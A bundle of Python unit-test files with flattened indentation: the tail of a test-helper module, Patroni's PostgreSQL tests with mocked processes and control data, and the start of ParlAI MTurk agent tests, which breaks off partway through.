# Overriding stderr doesn't work with libraries, this ensures even
# cached variables take this up. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def simulate_console_inputs(*inputs):
"""
Does some magic to simulate the given inputs to any calls to the ``input``
builtin. This yields back an InputGenerator object so you can check
which input was already used and append any additional inputs you want.
Example:
with simulate_console_inputs(0, 1, 2) as generator:
assert(input() == 0)
assert(generator.last_input == 0)
generator.inputs.append(3)
assert(input() == 1)
assert(input() == 2)
assert(input() == 3)
assert(generator.last_input == 3)
:param inputs: Any inputs to simulate.
:raises ValueError: Raised when was asked for more input but there's no
more provided.
"""
class InputGenerator:
def __init__(self, inputs):
self.last_input = -1
self.inputs = inputs
def generate_input(self, prompt=''):
print(prompt, end="")
self.last_input += 1
try:
return self.inputs[self.last_input]
except IndexError:
raise ValueError("Asked for more input, but no more was "
"provided from `simulate_console_inputs`.")
input_generator = InputGenerator(list(inputs))
_input = builtins.input
builtins.input = input_generator.generate_input
try:
yield input_generator
finally:
builtins.input = _input
@contextmanager
def make_temp(suffix="", prefix="tmp", dir=None):
"""
Creates a temporary file with a closed stream and deletes it when done.
:return: A contextmanager retrieving the file path.
"""
tempfile = create_tempfile(suffix=suffix, prefix=prefix, dir=dir)
try:
yield tempfile
finally:
os.remove(tempfile)
@contextmanager
def prepare_file(lines,
filename,
force_linebreaks=True,
create_tempfile=True,
tempfile_kwargs={}):
"""
Can create a temporary file (if filename is None) with the lines.
Can also add a trailing newline to each line specified if needed.
:param lines: The lines from the file. (list or tuple of strings)
:param filename: The filename to be prepared.
:param force_linebreaks: Whether to append newlines at each line if needed.
:param create_tempfile: Whether to save lines in tempfile if needed.
:param tempfile_kwargs: Kwargs passed to tempfile.mkstemp().
"""
if force_linebreaks:
lines = type(lines)(line if line.endswith('\n') else line + '\n'
for line in lines)
if not create_tempfile and filename is None:
filename = "dummy_file_name"
if not isinstance(filename, str) and create_tempfile:
with make_temp(**tempfile_kwargs) as filename:
with open(filename, 'w', encoding='utf-8') as file:
file.writelines(lines)
yield lines, filename
else:
yield lines, filename
@contextmanager
def change_directory(path):
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
@contextmanager
def open_files(*args):
"""
Handle opening and closing for multiple files at once.
:param args: Tuples with the format ``(filename, mode)``.
"""
files = []
for (file, mode) in args:
files.append(open(file, mode))
yield tuple(files)
for file in files:
file.close()
|
test_postgresql.py
|
import mock # for the mock.call method, importing it without a namespace breaks python3
import os
import psycopg2
import subprocess
import time
from mock import Mock, MagicMock, PropertyMock, patch, mock_open
from patroni.async_executor import CriticalTask
from patroni.dcs import Cluster, ClusterConfig, Member, RemoteMember, SyncState
from patroni.exceptions import PostgresConnectionException
from patroni.postgresql import Postgresql, STATE_REJECT, STATE_NO_RESPONSE
from patroni.postgresql.postmaster import PostmasterProcess
from patroni.postgresql.slots import SlotsHandler
from patroni.utils import RetryFailedError
from six.moves import builtins
from threading import Thread, current_thread
from . import BaseTestPostgresql, MockCursor, MockPostmaster, psycopg2_connect
mtime_ret = {}
def mock_mtime(filename):
if filename not in mtime_ret:
mtime_ret[filename] = time.time()
else:
mtime_ret[filename] += 1
return mtime_ret[filename]
def pg_controldata_string(*args, **kwargs):
return b"""
pg_control version number: 942
Catalog version number: 201509161
Database system identifier: 6200971513092291716
Database cluster state: shut down in recovery
pg_control last modified: Fri Oct 2 10:57:06 2015
Latest checkpoint location: 0/30000C8
Prior checkpoint location: 0/2000060
Latest checkpoint's REDO location: 0/3000090
Latest checkpoint's REDO WAL file: 000000020000000000000003
Latest checkpoint's TimeLineID: 2
Latest checkpoint's PrevTimeLineID: 2
Latest checkpoint's full_page_writes: on
Latest checkpoint's NextXID: 0/943
Latest checkpoint's NextOID: 24576
Latest checkpoint's NextMultiXactId: 1
Latest checkpoint's NextMultiOffset: 0
Latest checkpoint's oldestXID: 931
Latest checkpoint's oldestXID's DB: 1
Latest checkpoint's oldestActiveXID: 943
Latest checkpoint's oldestMultiXid: 1
Latest checkpoint's oldestMulti's DB: 1
Latest checkpoint's oldestCommitTs: 0
Latest checkpoint's newestCommitTs: 0
Time of latest checkpoint: Fri Oct 2 10:56:54 2015
Fake LSN counter for unlogged rels: 0/1
Minimum recovery ending location: 0/30241F8
Min recovery ending loc's timeline: 2
Backup start location: 0/0
Backup end location: 0/0
End-of-backup record required: no
wal_level setting: hot_standby
Current wal_log_hints setting: on
Current max_connections setting: 100
Current max_worker_processes setting: 8
Current max_prepared_xacts setting: 0
Current max_locks_per_xact setting: 64
Current track_commit_timestamp setting: off
Maximum data alignment: 8
Database block size: 8192
Blocks per segment of large relation: 131072
WAL block size: 8192
Bytes per WAL segment: 16777216
Maximum length of identifiers: 64
Maximum columns in an index: 32
Maximum size of a TOAST chunk: 1996
Size of a large-object chunk: 2048
Date/time type storage: 64-bit integers
Float4 argument passing: by value
Float8 argument passing: by value
Data page checksum version: 0
"""
@patch('subprocess.call', Mock(return_value=0))
@patch('psycopg2.connect', psycopg2_connect)
class TestPostgresql(BaseTestPostgresql):
@patch('subprocess.call', Mock(return_value=0))
@patch('os.rename', Mock())
@patch('patroni.postgresql.CallbackExecutor', Mock())
@patch.object(Postgresql, 'get_major_version', Mock(return_value=120000))
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def setUp(self):
super(TestPostgresql, self).setUp()
self.p.config.write_postgresql_conf()
self.p._callback_executor = Mock()
@patch('subprocess.Popen')
@patch.object(Postgresql, 'wait_for_startup')
@patch.object(Postgresql, 'wait_for_port_open')
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, 'controldata', Mock())
def test_start(self, mock_is_running, mock_wait_for_port_open, mock_wait_for_startup, mock_popen):
mock_is_running.return_value = MockPostmaster()
mock_wait_for_port_open.return_value = True
mock_wait_for_startup.return_value = False
mock_popen.return_value.stdout.readline.return_value = '123'
self.assertTrue(self.p.start())
mock_is_running.return_value = None
mock_postmaster = MockPostmaster()
with patch.object(PostmasterProcess, 'start', return_value=mock_postmaster):
pg_conf = os.path.join(self.p.data_dir, 'postgresql.conf')
open(pg_conf, 'w').close()
self.assertFalse(self.p.start(task=CriticalTask()))
with open(pg_conf) as f:
lines = f.readlines()
self.assertTrue("f.oo = 'bar'\n" in lines)
mock_wait_for_startup.return_value = None
self.assertFalse(self.p.start(10))
self.assertIsNone(self.p.start())
mock_wait_for_port_open.return_value = False
self.assertFalse(self.p.start())
task = CriticalTask()
task.cancel()
self.assertFalse(self.p.start(task=task))
self.p.cancellable.cancel()
self.assertFalse(self.p.start())
@patch.object(Postgresql, 'pg_isready')
@patch('patroni.postgresql.polling_loop', Mock(return_value=range(1)))
def test_wait_for_port_open(self, mock_pg_isready):
mock_pg_isready.return_value = STATE_NO_RESPONSE
mock_postmaster = MockPostmaster(is_running=False)
# No pid file and postmaster death
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
mock_postmaster.is_running.return_value = True
# timeout
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
# pg_isready failure
mock_pg_isready.return_value = 'garbage'
self.assertTrue(self.p.wait_for_port_open(mock_postmaster, 1))
# cancelled
self.p.cancellable.cancel()
self.assertFalse(self.p.wait_for_port_open(mock_postmaster, 1))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running')
@patch.object(Postgresql, '_wait_for_connection_close', Mock())
def test_stop(self, mock_is_running):
# Postmaster is not running
mock_callback = Mock()
mock_is_running.return_value = None
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
# Is running, stopped successfully
mock_is_running.return_value = mock_postmaster = MockPostmaster()
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
mock_postmaster.signal_stop.assert_called()
# Stop signal failed
mock_postmaster.signal_stop.return_value = False
self.assertFalse(self.p.stop())
# Stop signal failed to find process
mock_postmaster.signal_stop.return_value = True
mock_callback.reset_mock()
self.assertTrue(self.p.stop(on_safepoint=mock_callback))
mock_callback.assert_called()
def test_restart(self):
self.p.start = Mock(return_value=False)
self.assertFalse(self.p.restart())
self.assertEqual(self.p.state, 'restart failed (restarting)')
@patch('os.chmod', Mock())
@patch.object(builtins, 'open', MagicMock())
def test_write_pgpass(self):
self.p.config.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo'})
self.p.config.write_pgpass({'host': 'localhost', 'port': '5432', 'user': 'foo', 'password': 'bar'})
def test_checkpoint(self):
with patch.object(MockCursor, 'fetchone', Mock(return_value=(True, ))):
self.assertEqual(self.p.checkpoint({'user': 'postgres'}), 'is_in_recovery=true')
with patch.object(MockCursor, 'execute', Mock(return_value=None)):
self.assertIsNone(self.p.checkpoint())
self.assertEqual(self.p.checkpoint(), 'not accessible or not healty')
@patch('patroni.postgresql.config.mtime', mock_mtime)
@patch('patroni.postgresql.config.ConfigHandler._get_pg_settings')
def test_check_recovery_conf(self, mock_get_pg_settings):
mock_get_pg_settings.return_value = {
'primary_conninfo': ['primary_conninfo', 'foo=', None, 'string', 'postmaster'],
'recovery_min_apply_delay': ['recovery_min_apply_delay', '0', 'ms', 'integer', 'sighup']
}
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': 'on'})
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
mock_get_pg_settings.return_value['primary_conninfo'][1] = ''
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '1'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, False))
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '0'
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
conninfo = {'host': '1', 'password': 'bar'}
with patch('patroni.postgresql.config.ConfigHandler.primary_conninfo_params', Mock(return_value=conninfo)):
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '1'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
mock_get_pg_settings.return_value['primary_conninfo'][1] = 'host=1 passfile=' + self.p.config._pgpass
mock_get_pg_settings.return_value['recovery_min_apply_delay'][1] = '0'
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': conninfo.copy()})
self.p.config.write_postgresql_conf()
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
@patch.object(Postgresql, 'major_version', PropertyMock(return_value=120000))
@patch.object(Postgresql, 'is_running', MockPostmaster)
@patch.object(MockPostmaster, 'create_time', Mock(return_value=1234567), create=True)
@patch('patroni.postgresql.config.ConfigHandler._get_pg_settings')
def test__read_recovery_params(self, mock_get_pg_settings):
mock_get_pg_settings.return_value = {'primary_conninfo': ['primary_conninfo', '', None, 'string', 'postmaster']}
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': {'password': 'foo'}})
self.p.config.write_postgresql_conf()
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
self.assertEqual(self.p.config.check_recovery_conf(None), (False, False))
mock_get_pg_settings.side_effect = Exception
with patch('patroni.postgresql.config.mtime', mock_mtime):
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
@patch.object(Postgresql, 'major_version', PropertyMock(return_value=100000))
def test__read_recovery_params_pre_v12(self):
self.p.config.write_recovery_conf({'standby_mode': 'on', 'primary_conninfo': {'password': 'foo'}})
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
self.p.config.write_recovery_conf({'standby_mode': '\n'})
with patch('patroni.postgresql.config.mtime', mock_mtime):
self.assertEqual(self.p.config.check_recovery_conf(None), (True, True))
def test_write_postgresql_and_sanitize_auto_conf(self):
read_data = 'primary_conninfo = foo\nfoo = bar\n'
with open(os.path.join(self.p.data_dir, 'postgresql.auto.conf'), 'w') as f:
f.write(read_data)
mock_read_auto = mock_open(read_data=read_data)
mock_read_auto.return_value.__iter__ = lambda o: iter(o.readline, '')
with patch.object(builtins, 'open', Mock(side_effect=[mock_open()(), mock_read_auto(), IOError])),\
patch('os.chmod', Mock()):
self.p.config.write_postgresql_conf()
with patch.object(builtins, 'open', Mock(side_effect=[mock_open()(), IOError])), patch('os.chmod', Mock()):
self.p.config.write_postgresql_conf()
self.p.config.write_recovery_conf({'foo': 'bar'})
self.p.config.write_postgresql_conf()
@patch.object(Postgresql, 'is_running', Mock(return_value=False))
@patch.object(Postgresql, 'start', Mock())
def test_follow(self):
self.p.call_nowait('on_start')
m = RemoteMember('1', {'restore_command': '2', 'primary_slot_name': 'foo', 'conn_kwargs': {'host': 'bar'}})
self.p.follow(m)
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
def test_sync_replication_slots(self):
self.p.start()
config = ClusterConfig(1, {'slots': {'ls': {'database': 'a', 'plugin': 'b'},
'A': 0, 'test_3': 0, 'b': {'type': 'logical', 'plugin': '1'}}}, 1)
cluster = Cluster(True, config, self.leader, 0, [self.me, self.other, self.leadermem], None, None, None)
with mock.patch('patroni.postgresql.Postgresql._query', Mock(side_effect=psycopg2.OperationalError)):
self.p.slots_handler.sync_replication_slots(cluster)
self.p.slots_handler.sync_replication_slots(cluster)
with mock.patch('patroni.postgresql.Postgresql.role', new_callable=PropertyMock(return_value='replica')):
self.p.slots_handler.sync_replication_slots(cluster)
with patch.object(SlotsHandler, 'drop_replication_slot', Mock(return_value=True)),\
patch('patroni.dcs.logger.error', new_callable=Mock()) as errorlog_mock:
alias1 = Member(0, 'test-3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
alias2 = Member(0, 'test.3', 28, {'conn_url': 'postgres://replicator:rep-pass@127.0.0.1:5436/postgres'})
cluster.members.extend([alias1, alias2])
self.p.slots_handler.sync_replication_slots(cluster)
self.assertEqual(errorlog_mock.call_count, 5)
ca = errorlog_mock.call_args_list[0][0][1]
self.assertTrue("test-3" in ca, "non matching {0}".format(ca))
self.assertTrue("test.3" in ca, "non matching {0}".format(ca))
@patch.object(MockCursor, 'execute', Mock(side_effect=psycopg2.OperationalError))
def test__query(self):
self.assertRaises(PostgresConnectionException, self.p._query, 'blabla')
self.p._state = 'restarting'
self.assertRaises(RetryFailedError, self.p._query, 'blabla')
def test_query(self):
self.p.query('select 1')
self.assertRaises(PostgresConnectionException, self.p.query, 'RetryFailedError')
self.assertRaises(psycopg2.ProgrammingError, self.p.query, 'blabla')
@patch.object(Postgresql, 'pg_isready', Mock(return_value=STATE_REJECT))
def test_is_leader(self):
self.assertTrue(self.p.is_leader())
self.p.reset_cluster_info_state()
with patch.object(Postgresql, '_query', Mock(side_effect=RetryFailedError(''))):
self.assertRaises(PostgresConnectionException, self.p.is_leader)
def test_reload(self):
self.assertTrue(self.p.reload())
@patch.object(Postgresql, 'is_running')
def test_is_healthy(self, mock_is_running):
mock_is_running.return_value = True
self.assertTrue(self.p.is_healthy())
mock_is_running.return_value = False
self.assertFalse(self.p.is_healthy())
def test_promote(self):
self.p.set_role('replica')
self.assertIsNone(self.p.promote(0))
self.assertTrue(self.p.promote(0))
def test_timeline_wal_position(self):
self.assertEqual(self.p.timeline_wal_position(), (1, 2))
Thread(target=self.p.timeline_wal_position).start()
@patch.object(PostmasterProcess, 'from_pidfile')
def test_is_running(self, mock_frompidfile):
# Cached postmaster running
mock_postmaster = self.p._postmaster_proc = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster)
# Cached postmaster not running, no postmaster running
mock_postmaster.is_running.return_value = False
mock_frompidfile.return_value = None
self.assertEqual(self.p.is_running(), None)
self.assertEqual(self.p._postmaster_proc, None)
# No cached postmaster, postmaster running
mock_frompidfile.return_value = mock_postmaster2 = MockPostmaster()
self.assertEqual(self.p.is_running(), mock_postmaster2)
self.assertEqual(self.p._postmaster_proc, mock_postmaster2)
@patch('shlex.split', Mock(side_effect=OSError))
def test_call_nowait(self):
self.p.set_role('replica')
self.assertIsNone(self.p.call_nowait('on_start'))
self.p.bootstrapping = True
self.assertIsNone(self.p.call_nowait('on_start'))
def test_non_existing_callback(self):
self.assertFalse(self.p.call_nowait('foobar'))
@patch.object(Postgresql, 'is_running', Mock(return_value=MockPostmaster()))
def test_is_leader_exception(self):
self.p.start()
self.p.query = Mock(side_effect=psycopg2.OperationalError("not supported"))
self.assertTrue(self.p.stop())
@patch('os.rename', Mock())
@patch('os.path.isdir', Mock(return_value=True))
def test_move_data_directory(self):
self.p.move_data_directory()
with patch('os.rename', Mock(side_effect=OSError)):
self.p.move_data_directory()
@patch('os.listdir', Mock(return_value=['recovery.conf']))
@patch('os.path.exists', Mock(return_value=True))
@patch.object(Postgresql, 'controldata', Mock())
def test_get_postgres_role_from_data_directory(self):
self.assertEqual(self.p.get_postgres_role_from_data_directory(), 'replica')
def test_remove_data_directory(self):
def _symlink(src, dst):
try:
os.symlink(src, dst)
except OSError:
if os.name == 'nt': # os.symlink under Windows needs admin rights skip it
pass
os.makedirs(os.path.join(self.p.data_dir, 'foo'))
_symlink('foo', os.path.join(self.p.data_dir, 'pg_wal'))
self.p.remove_data_directory()
open(self.p.data_dir, 'w').close()
self.p.remove_data_directory()
_symlink('unexisting', self.p.data_dir)
with patch('os.unlink', Mock(side_effect=OSError)):
self.p.remove_data_directory()
self.p.remove_data_directory()
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
def test_controldata(self):
with patch('subprocess.check_output', Mock(return_value=0, side_effect=pg_controldata_string)):
data = self.p.controldata()
self.assertEqual(len(data), 50)
self.assertEqual(data['Database cluster state'], 'shut down in recovery')
self.assertEqual(data['wal_log_hints setting'], 'on')
self.assertEqual(int(data['Database block size']), 8192)
with patch('subprocess.check_output', Mock(side_effect=subprocess.CalledProcessError(1, ''))):
self.assertEqual(self.p.controldata(), {})
@patch('patroni.postgresql.Postgresql._version_file_exists', Mock(return_value=True))
@patch('subprocess.check_output', MagicMock(return_value=0, side_effect=pg_controldata_string))
def test_sysid(self):
self.assertEqual(self.p.sysid, "6200971513092291716")
@patch('os.path.isfile', Mock(return_value=True))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_save_configuration_files(self):
self.p.config.save_configuration_files()
@patch('os.path.isfile', Mock(side_effect=[False, True]))
@patch('shutil.copy', Mock(side_effect=IOError))
def test_restore_configuration_files(self):
self.p.config.restore_configuration_files()
def test_can_create_replica_without_replication_connection(self):
self.p.config._config['create_replica_method'] = []
self.assertFalse(self.p.can_create_replica_without_replication_connection())
self.p.config._config['create_replica_method'] = ['wale', 'basebackup']
self.p.config._config['wale'] = {'command': 'foo', 'no_master': 1}
self.assertTrue(self.p.can_create_replica_without_replication_connection())
def test_replica_method_can_work_without_replication_connection(self):
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('basebackup'))
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foobar'))
self.p.config._config['foo'] = {'command': 'bar', 'no_master': 1}
self.assertTrue(self.p.replica_method_can_work_without_replication_connection('foo'))
self.p.config._config['foo'] = {'command': 'bar'}
self.assertFalse(self.p.replica_method_can_work_without_replication_connection('foo'))
@patch('time.sleep', Mock())
@patch.object(Postgresql, 'is_running', Mock(return_value=True))
@patch.object(MockCursor, 'fetchone')
def test_reload_config(self, mock_fetchone):
mock_fetchone.return_value = (1,)
parameters = self._PARAMETERS.copy()
parameters.pop('f.oo')
parameters['wal_buffers'] = '512'
config = {'pg_hba': [''], 'pg_ident': [''], 'use_unix_socket': True, 'authentication': {},
'retry_timeout': 10, 'listen': '*', 'krbsrvname': 'postgres', 'parameters': parameters}
self.p.reload_config(config)
mock_fetchone.side_effect = Exception
parameters['b.ar'] = 'bar'
self.p.reload_config(config)
parameters['autovacuum'] = 'on'
self.p.reload_config(config)
parameters['autovacuum'] = 'off'
parameters.pop('search_path')
config['listen'] = '*:5433'
self.p.reload_config(config)
parameters['unix_socket_directories'] = '.'
self.p.reload_config(config)
self.p.config.resolve_connection_addresses()
@patch.object(Postgresql, '_version_file_exists', Mock(return_value=True))
def test_get_major_version(self):
with patch.object(builtins, 'open', mock_open(read_data='9.4')):
self.assertEqual(self.p.get_major_version(), 90400)
with patch.object(builtins, 'open', Mock(side_effect=Exception)):
self.assertEqual(self.p.get_major_version(), 0)
def test_postmaster_start_time(self):
with patch.object(MockCursor, "fetchone", Mock(return_value=('foo', True, '', '', '', '', False))):
self.assertEqual(self.p.postmaster_start_time(), 'foo')
t = Thread(target=self.p.postmaster_start_time)
t.start()
t.join()
with patch.object(MockCursor, "execute", side_effect=psycopg2.Error):
self.assertIsNone(self.p.postmaster_start_time())
def test_check_for_startup(self):
with patch('subprocess.call', return_value=0):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=1):
self.p._state = 'starting'
self.assertTrue(self.p.check_for_startup())
self.assertEqual(self.p.state, 'starting')
with patch('subprocess.call', return_value=2):
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'start failed')
with patch('subprocess.call', return_value=0):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
with patch('subprocess.call', return_value=127):
self.p._state = 'running'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
self.p._state = 'starting'
self.assertFalse(self.p.check_for_startup())
self.assertEqual(self.p.state, 'running')
def test_wait_for_startup(self):
state = {'sleeps': 0, 'num_rejects': 0, 'final_return': 0}
self.__thread_ident = current_thread().ident
def increment_sleeps(*args):
if current_thread().ident == self.__thread_ident:
print("Sleep")
state['sleeps'] += 1
def isready_return(*args):
ret = 1 if state['sleeps'] < state['num_rejects'] else state['final_return']
print("Isready {0} {1}".format(ret, state))
return ret
def time_in_state(*args):
return state['sleeps']
with patch('subprocess.call', side_effect=isready_return):
with patch('time.sleep', side_effect=increment_sleeps):
self.p.time_in_state = Mock(side_effect=time_in_state)
self.p._state = 'stopped'
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 0)
self.p._state = 'starting'
state['num_rejects'] = 5
self.assertTrue(self.p.wait_for_startup())
self.assertEqual(state['sleeps'], 5)
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 2
self.assertFalse(self.p.wait_for_startup())
self.p._state = 'starting'
state['sleeps'] = 0
state['final_return'] = 0
self.assertFalse(self.p.wait_for_startup(timeout=2))
self.assertEqual(state['sleeps'], 3)
with patch.object(Postgresql, 'check_startup_state_changed', Mock(return_value=False)):
self.p.cancellable.cancel()
self.p._state = 'starting'
self.assertIsNone(self.p.wait_for_startup())
def test_pick_sync_standby(self):
cluster = Cluster(True, None, self.leader, 0, [self.me, self.other, self.leadermem], None,
SyncState(0, self.me.name, self.leadermem.name), None)
with patch.object(Postgresql, "query", return_value=[
(self.leadermem.name, 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, True))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.leadermem.name, 'streaming', 'potential'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.leadermem.name, False))
with patch.object(Postgresql, "query", return_value=[
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[
('missing', 'streaming', 'sync'),
(self.me.name, 'streaming', 'async'),
(self.other.name, 'streaming', 'async'),
]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (self.me.name, False))
with patch.object(Postgresql, "query", return_value=[]):
self.assertEqual(self.p.pick_synchronous_standby(cluster), (None, False))
def test_set_sync_standby(self):
def value_in_conf():
with open(os.path.join(self.p.data_dir, 'postgresql.conf')) as f:
for line in f:
if line.startswith('synchronous_standby_names'):
return line.strip()
mock_reload = self.p.reload = Mock()
self.p.config.set_synchronous_standby('n1')
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
mock_reload.assert_called()
mock_reload.reset_mock()
self.p.config.set_synchronous_standby('n1')
mock_reload.assert_not_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n1'")
self.p.config.set_synchronous_standby('n2')
mock_reload.assert_called()
self.assertEqual(value_in_conf(), "synchronous_standby_names = 'n2'")
mock_reload.reset_mock()
self.p.config.set_synchronous_standby(None)
mock_reload.assert_called()
self.assertEqual(value_in_conf(), None)
def test_get_server_parameters(self):
config = {'synchronous_mode': True, 'parameters': {'wal_level': 'hot_standby'}, 'listen': '0'}
self.p.config.get_server_parameters(config)
config['synchronous_mode_strict'] = True
self.p.config.get_server_parameters(config)
self.p.config.set_synchronous_standby('foo')
self.p.config.get_server_parameters(config)
@patch('time.sleep', Mock())
def test__wait_for_connection_close(self):
mock_postmaster = MockPostmaster()
with patch.object(Postgresql, 'is_running', Mock(return_value=mock_postmaster)):
mock_postmaster.is_running.side_effect = [True, False, False]
mock_callback = Mock()
self.p.stop(on_safepoint=mock_callback)
mock_postmaster.is_running.side_effect = [True, False, False]
with patch.object(MockCursor, "execute", Mock(side_effect=psycopg2.Error)):
self.p.stop(on_safepoint=mock_callback)
def test_terminate_starting_postmaster(self):
mock_postmaster = MockPostmaster()
self.p.terminate_starting_postmaster(mock_postmaster)
mock_postmaster.signal_stop.assert_called()
mock_postmaster.wait.assert_called()
def test_read_postmaster_opts(self):
m = mock_open(read_data='/usr/lib/postgres/9.6/bin/postgres "-D" "data/postgresql0" \
"--listen_addresses=127.0.0.1" "--port=5432" "--hot_standby=on" "--wal_level=hot_standby" \
"--wal_log_hints=on" "--max_wal_senders=5" "--max_replication_slots=5"\n')
with patch.object(builtins, 'open', m):
data = self.p.read_postmaster_opts()
self.assertEqual(data['wal_level'], 'hot_standby')
self.assertEqual(int(data['max_replication_slots']), 5)
self.assertEqual(data.get('D'), None)
m.side_effect = IOError
data = self.p.read_postmaster_opts()
self.assertEqual(data, dict())
@patch('psutil.Popen')
def test_single_user_mode(self, subprocess_popen_mock):
subprocess_popen_mock.return_value.wait.return_value = 0
self.assertEqual(self.p.single_user_mode('CHECKPOINT', {'archive_mode': 'on'}), 0)
@patch('os.listdir', Mock(side_effect=[OSError, ['a', 'b']]))
@patch('os.unlink', Mock(side_effect=OSError))
@patch('os.remove', Mock())
@patch('os.path.islink', Mock(side_effect=[True, False]))
@patch('os.path.isfile', Mock(return_value=True))
def test_cleanup_archive_status(self):
self.p.cleanup_archive_status()
self.p.cleanup_archive_status()
@patch('os.unlink', Mock())
@patch('os.listdir', Mock(return_value=[]))
@patch('os.path.isfile', Mock(return_value=True))
@patch.object(Postgresql, 'read_postmaster_opts', Mock(return_value={}))
@patch.object(Postgresql, 'single_user_mode', Mock(return_value=0))
def test_fix_cluster_state(self):
self.assertTrue(self.p.fix_cluster_state())
def test_replica_cached_timeline(self):
self.assertEqual(self.p.replica_cached_timeline(1), 2)
def test_get_master_timeline(self):
self.assertEqual(self.p.get_master_timeline(), 1)
@patch.object(Postgresql, 'get_postgres_role_from_data_directory', Mock(return_value='replica'))
def test__build_effective_configuration(self):
with patch.object(Postgresql, 'controldata',
Mock(return_value={'max_connections setting': '200',
'max_worker_processes setting': '20',
'max_prepared_xacts setting': '100',
'max_locks_per_xact setting': '100',
'max_wal_senders setting': 10})):
self.p.cancellable.cancel()
self.assertFalse(self.p.start())
self.assertTrue(self.p.pending_restart)
|
test_mturk_agent.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE,
AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING,
AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE,
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
